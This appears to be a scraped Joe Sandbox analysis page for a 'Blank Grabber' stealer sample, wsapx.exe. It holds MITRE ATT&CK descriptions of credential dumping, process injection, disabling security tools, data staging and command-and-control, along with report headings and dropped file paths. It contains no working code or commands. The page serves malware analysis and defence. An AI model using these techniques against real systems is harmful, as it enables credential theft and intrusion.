Instruction ID: dd38d9f6bc0214518b3630aff46d1e74254fbae03a5e8460b6dca6843e69280e
Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
Instruction Fuzzy Hash: 6AE01A26E2882252EA54B775FC810B43251AF71774FB04730F03EC21E29F2CA54AE301

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wsapx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Blank Grabber

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\ ?? ?\Display (1).png

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

C:\Users\user\AppData\Local\Temp\RES226F.tmp

Windows Analysis Report
wsapx.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre